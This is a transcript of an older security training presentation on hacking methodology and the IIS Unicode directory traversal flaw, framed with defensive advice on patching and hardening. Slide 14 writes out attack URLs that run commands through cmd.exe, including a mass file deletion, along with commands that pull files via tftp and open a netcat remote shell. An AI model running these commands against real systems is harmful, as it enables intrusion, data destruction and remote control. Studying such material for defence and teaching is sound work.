Presentation is loading. Please wait.

Presentation is loading. Please wait.

Expose the Vulnerability Paul Hogan Ward Solutions.

Published byCarl Winger Modified over 10 years ago

Similar presentations

Presentation on theme: "Expose the Vulnerability Paul Hogan Ward Solutions."— Presentation transcript:

1 Expose the Vulnerability Paul Hogan Ward Solutions

2 Session Prerequisites Hands-on experience with Windows 2000 or Windows Server 2003 Working knowledge of networking, including basics of security Basic knowledge of network security-assessment strategies Level 300

3 Anatomy of a Hack Information Gathering / Profiling  nslookup, whois Probe / Enumerating  Superscan, nmap, nessus, nikto, banner grabbing, OS fingerprinting Attack  Unicode directory traversal Advancement Entrenchment Infiltration/Extraction

4 nslookup

5 RIPE Whois

6 superscan

7 Simple Command Line Utilities net view \\172.16.10.5 net use \\172.16.10.5 net use \\172.16.10.5 "" /u:"" red button vulnerability net view \\172.16.10.5 nbtstat -A 172.16.10.5 nbtscan -r 172.16.10.0/24 net use \\172.16.10.5 "" /u:guest

8 nmap nessus

9 nikto

10 Overview Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory Traversal Vulnerability. (BugTraq ID 1806) Operating System: Windows NT 4.0 (+ IIS 4.0) and Windows 2000 (+ IIS 5.0). Brief Description: A particular type of malformed URL could be used to access files and directories beyond the web folders. This would potentially enable a malicious user to gain privileges commensurate with those of a locally logged-on users. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it.

11

12 Impacts If the E-business web server was compromised, the backend database sever is under threat too. Trust relationship. Same passwords. Database connection pools. Use web server and database server as a relay to connect the outside machine with the internal machines. Then firewall is circumvented…… If the compromised web server is a site for software distribution, add Trojans or Zombie codes to the downloadable software, then you can control all the machines which download software from that website…..

13 Solutions Install patches as soon as possible  Patch Management: SMS/SUS/MBSA Disable NetBIOS over TCP/IP. Be sure that the IUSR_machinename account does not have write access to any files on the server.

14 Unicode Directory Traversal Attack http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.* perl -x unicodexecute.pl 172.16.10.5:80 dir perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.* perl -x unicodexecute.pl 172.16.10.5:80 nc -L –p555 -d -e cmd.exe c:\nc 192.168.1.2 443

15 How To Get Your Network Hacked In 10 Easy Steps 1. Don’t patch anything 2. Run unhardened applications 3. Logon everywhere as a domain admin 4. Open lots of holes in the firewall 5. Allow unrestricted internal traffic 6. Allow all outbound traffic 7. Don’t harden servers 8. Use lame passwords 9. Use high-level service accounts, in multiple places 10. Assume everything is OK

16 The moral Initial entry is everything Most networks are designed like egg shells  Hard and crunchy on the outside  Soft and chewy on the inside Once an attacker is inside the network you can…  Update resume  Hope he does a good job running it  Drain the network

Download ppt "Expose the Vulnerability Paul Hogan Ward Solutions."

Similar presentations

Auditing Microsoft Active Directory

Auditing Microsoft Active Directory
Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)

Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)
AD User Import From SIMS.NET

AD User Import From SIMS.NET
Your Definitive Lockdown Guide

Your Definitive Lockdown Guide
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
ACT User Meeting June 2011. Your entitlements window Entitlements, roles and v1 security overview Problems with v1 security Tasks, jobs and v2 security.

ACT User Meeting June Your entitlements window Entitlements, roles and v1 security overview Problems with v1 security Tasks, jobs and v2 security.
Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
Company LOGO WEB SYSTEM. Components of a Generic Web Application System.

Company LOGO WEB SYSTEM. Components of a Generic Web Application System.
Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.

Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.

Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.
Network Shares and Accounts Sharing Printers, Drives, Folders – Setup Windows 95/98 Windows NT (2000, XP) Linux – Users – Groups.

Network Shares and Accounts Sharing Printers, Drives, Folders – Setup Windows 95/98 Windows NT (2000, XP) Linux – Users – Groups.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost 127.0.0.1 (loopback address)  Internal networks 

Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost (loopback address)  Internal networks 
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Microsoft Baseline Security Analyzer INLS 187 Security Software Presentation by Hinár György Polczer

Microsoft Baseline Security Analyzer INLS 187 Security Software Presentation by Hinár György Polczer
Patching MIT SUS Services IS&T Network Infrastructure Services Team.

Patching MIT SUS Services IS&T Network Infrastructure Services Team.
Hacking Web Server Defiana Arnaldy, M.Si 0818 0296 4763.

Hacking Web Server Defiana Arnaldy, M.Si
Network Security. Trust Relationships (Trust Zones) High trust (internal) = f c (once you gain access); g p Low trust ( ) = more controls; fewer privileges.

Network Security. Trust Relationships (Trust Zones) High trust (internal) = f c (once you gain access); g p Low trust ( ) = more controls; fewer privileges.

Similar presentations

Ads by Google